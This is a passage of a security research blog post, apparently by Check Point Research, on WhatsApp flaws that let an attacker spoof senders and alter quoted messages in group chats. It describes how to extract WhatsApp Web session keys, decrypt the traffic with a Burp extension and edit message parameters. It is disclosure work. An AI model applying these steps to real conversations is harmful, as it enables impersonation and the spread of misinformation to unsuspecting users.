Research By: Dikla Barda, Roman Zaikin and Oded Vanunu
As of early 2018, the Facebook-owned messaging application, WhatsApp, has over 1.5 billion users with over one billion groups and 65 billion messages sent every day. With so much chatter, the potential for online scams, rumours and fake news is huge. It doesn’t help then, if threat actors have an additional weapon in their arsenal to leverage the platform for their malicious intentions.
Check Point Research, however, recently unveiled new vulnerabilities in the popular messaging application that could allow threat actors to intercept and manipulate messages sent in both private and group conversations, giving attackers immense power to create and spread misinformation from what appear to be trusted sources.
Our teamobserved three possible methods of attack exploiting this vulnerability all of which involve social engineering tactics to fool end-users. A threat actor can:
Use the ‘quote’ feature in a group conversation to change the identity of the sender, even if that person is not a member of the group. Alter the text of someone else’s reply, essentially putting words in their mouth. Send a private message to another group participant that is disguised as a public message for all, so when the targeted individual responds, it’s visible to everyone in the conversation.Following the process of Responsible Disclosure, Check Point Research informed WhatsApp of their findings. From Check Point Research’s view, we believe these vulnerabilities to be of the utmost importance and require attention.
Please read below for our full technical analysis.
Demonstration Video of the Attacks in Action
Technical AnalysisAs is well known, WhatsApp encrypts every message, picture, call, video or any other type of content you send so that only the recipient can see it. What’s more, not even WhatsApp has the ability to view those messages.
Figure 1:WhatsApp Encrypted Chat
These encryption processes caught our attention and we decided to try to reverse WhatsApp’s algorithm to decrypt the data. Indeed, after decrypting the WhatsApp communication we found that WhatsApp is using the “ protobuf2 protocol ” to do so.
By converting this protobuf2 data to Json we were able to see the actual parameters that are sent and manipulate them in order to check WhatsApp’s security.
The outcome of our research is a Burp Suit Extension and 3 Manipulation methods .
To start the manipulation, though, we first have to get the private and public key of our session and fill it in our burpsuit extension.
If you are interested in a detailed explanation about how the encryption actually works behind the scenes, please read the encryption paragraph at the end of this blog post.
Accessing the KeysThe keys can be obtained from the key generation phase from WhatsApp Web before the QR code is generated:
Figure 2:Public and Private Key of the Communication
After we take these keys we need to take the “secret” parameter which is sent by the mobile phone to WhatsApp Web while the user scans the QR code:
Figure 3:The Secret Key from the WebSocket
As a result of this, our extension will look like the below:
Figure 4:WhatsApp Decoder Burp Extension
After clicking on “Connect”, the extension connects to the extension’s local server, which will perform all the tasks required for the extension.
Manipulating WhatsAppBy decrypting the WhatsApp communication, we were able to see all the parameters that are actually sent between the mobile version of WhatsApp and the Web version. This allowed us to then be able to manipulate them and start looking for security issues.
This resulted in us being able to carry out a variety of attack types, which are described below.
Attack 1: Change the Identity of a Sender in a Group Chat, Even If They Are Not a Member of the Group
In this attack, it is possible to spoof a reply message to impersonate another group member and even a non-existing group member, for example, ‘Mickey Mouse’.
To impersonate someone from the group, all the attacker need do is catch the encrypted traffic:
Figure 5:Encrypted WhatsApp Communication
Once the traffic is captured, he can simply send it to an extension which will then decrypt the traffic:
Figure 6:Decrypting the WhatsApp Message
By Using Our Extension
The interesting parameters to note here are:
conversation This is the actual content which is sent. participant This is the participant that actually sent the content. fromMe This parameter indicates if I sent the data or someone else in the group. remoteJid This parameter indicates to which group/contact the data is sent. id The id of the data. The same id will appear in the phone databases.And this is the point where interesting things begin to happen…
For example, we can change the conversation to something else. The message with the content “ Great! ” sent by a member of a group, for instance, could be changed to something else like: “ I’m going to die, in a hospital right now ” and the participant parameter could also be changed to someone else from the group:
Figure 7:ASpoofed Reply Message
Note that we have to change the id to something else because it is already sent and appears in the database.
In order to make everyone see the new spoofed message the attacker needs to reply to the message he spoofed, quoting and changing that message (“Great”) in order for it be sent to everyone in the group.
As you can see in the below screenshot, we created a new group where no previous messages were sent, and by using the method from above we were able to create a fake reply.
Figure 8:The Original Conversation
The ‘participant’ parameter can also be a text or a phone number of someone that is not in the group, which would cause everyone in the group to believe that it actually is sent from this participant.
For example:
Figure 9:Changing The Content Of The Message
By Using Our Debugging Tool
…and the result will look like this: